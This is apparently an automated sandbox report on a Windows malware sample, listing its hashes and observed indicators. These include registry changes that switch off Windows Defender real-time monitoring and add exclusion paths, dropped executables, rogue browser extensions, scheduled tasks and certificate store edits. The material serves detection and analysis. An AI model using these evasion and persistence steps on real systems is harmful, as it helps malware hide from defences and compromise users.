Analysis
-
max time kernel
135s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
24-09-2022 06:12
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
6176d4856a785eb156cdae0c70844f3b
-
SHA1
cb0167d4af002e0115f0e39a0f23dd6276b81cc6
-
SHA256
b1c1014b9c81967dc1aa9e138b43d9cc1b626c30059af7d397c27a66c4101e72
-
SHA512
7dea52403aa88318ea95f61f586279d97a5c32e3665de6a4dcac215ea53a80901edf49997a9851ca824420536af11fd39b6ba7960efd92d50dbc47c51e91512e
-
SSDEEP
196608:91OgsO+CL42yOtVx8YRHhgnoTMQTkvH5eOeZz7:3OJO+C3v8b6g/5VeN
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QYiUKrukFVUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATZmuaBwNwmU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QYiUKrukFVUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SHsJRQZsU = "0" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SHsJRQZsU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\aJAQLsoDkiWqC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATZmuaBwNwmU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fxkldoUMcXUSOxVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fxkldoUMcXUSOxVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MYjwJFnMfsmfKHMw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\aJAQLsoDkiWqC = "0" conhost.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 29 776 rundll32.exe 30 776 rundll32.exe 31 776 rundll32.exe 32 776 rundll32.exe 33 776 rundll32.exe 35 776 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 948 Install.exe 1760 Install.exe 1516 XkDDQQo.exe 1596 XCxlqIJ.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 12 IoCs
pid Process 2028 file.exe 948 Install.exe 948 Install.exe 948 Install.exe 948 Install.exe 1760 Install.exe 1760 Install.exe 1760 Install.exe 776 rundll32.exe 776 rundll32.exe 776 rundll32.exe 776 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json XCxlqIJ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json XCxlqIJ.exe -
Drops file in System32 directory 23 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA XCxlqIJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 XCxlqIJ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol XCxlqIJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 XCxlqIJ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol XkDDQQo.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 XCxlqIJ.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol XkDDQQo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 XCxlqIJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 XCxlqIJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 XCxlqIJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA XCxlqIJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA XCxlqIJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA XCxlqIJ.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini XkDDQQo.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat XCxlqIJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 XCxlqIJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 XCxlqIJ.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\SHsJRQZsU\rBrrglm.xml XCxlqIJ.exe File created C:\Program Files (x86)\ATZmuaBwNwmU2\fWGtHwOvNvQdM.dll XCxlqIJ.exe File created C:\Program Files (x86)\ATZmuaBwNwmU2\qrwUJMs.xml XCxlqIJ.exe File created C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\gHwCvYm.dll XCxlqIJ.exe File created C:\Program Files (x86)\SHsJRQZsU\Wtwvvd.dll XCxlqIJ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi XCxlqIJ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi XCxlqIJ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja XCxlqIJ.exe File created C:\Program Files (x86)\aJAQLsoDkiWqC\hKEEzLh.xml XCxlqIJ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak XCxlqIJ.exe File created C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\BwUFlhz.xml XCxlqIJ.exe File created C:\Program Files (x86)\aJAQLsoDkiWqC\ynvrEnb.dll XCxlqIJ.exe File created C:\Program Files (x86)\QYiUKrukFVUn\lwWmNgA.dll XCxlqIJ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\DNDvMcbpefrYjKZ.job schtasks.exe File created C:\Windows\Tasks\mDNVJgqIdbaAfzWWp.job schtasks.exe File created C:\Windows\Tasks\bNHXguvSZYiOwSiXLC.job schtasks.exe File created C:\Windows\Tasks\VgOpnHVQDAdMZqNFB.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1956 schtasks.exe 580 schtasks.exe 388 schtasks.exe 336 schtasks.exe 1708 schtasks.exe 1380 schtasks.exe 960 schtasks.exe 1656 schtasks.exe 1828 schtasks.exe 1948 schtasks.exe 1936 schtasks.exe 2004 schtasks.exe 1552 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates XCxlqIJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3FC8BC12-6529-4CF7-93D5-68187D02130E}\76-03-fd-b3-6a-ca rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" XCxlqIJ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3FC8BC12-6529-4CF7-93D5-68187D02130E}\WpadDecisionTime = b08696dddccfd801 XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3FC8BC12-6529-4CF7-93D5-68187D02130E}\WpadDecisionReason = "1" XCxlqIJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" XCxlqIJ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs XCxlqIJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix XCxlqIJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs XCxlqIJ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 XCxlqIJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3FC8BC12-6529-4CF7-93D5-68187D02130E}\WpadDecision = "0" XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3FC8BC12-6529-4CF7-93D5-68187D02130E}\76-03-fd-b3-6a-ca XCxlqIJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-03-fd-b3-6a-ca\WpadDecisionReason = "1" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-03-fd-b3-6a-ca rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f001d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3FC8BC12-6529-4CF7-93D5-68187D02130E}\WpadNetworkName = "Network 2" XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs XCxlqIJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-03-fd-b3-6a-ca\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings XCxlqIJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs XCxlqIJ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-03-fd-b3-6a-ca\WpadDecisionTime = b08696dddccfd801 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ XCxlqIJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates XCxlqIJ.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 XCxlqIJ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde XCxlqIJ.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1632 powershell.EXE 1632 powershell.EXE 1632 powershell.EXE 1488 powershell.EXE 1488 powershell.EXE 1488 powershell.EXE 1204 powershell.EXE 1204 powershell.EXE 1204 powershell.EXE 452 powershell.EXE 452 powershell.EXE 452 powershell.EXE 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe 1596 XCxlqIJ.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1632 powershell.EXE Token: SeDebugPrivilege 1488 powershell.EXE Token: SeDebugPrivilege 1204 powershell.EXE Token: SeDebugPrivilege 452 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
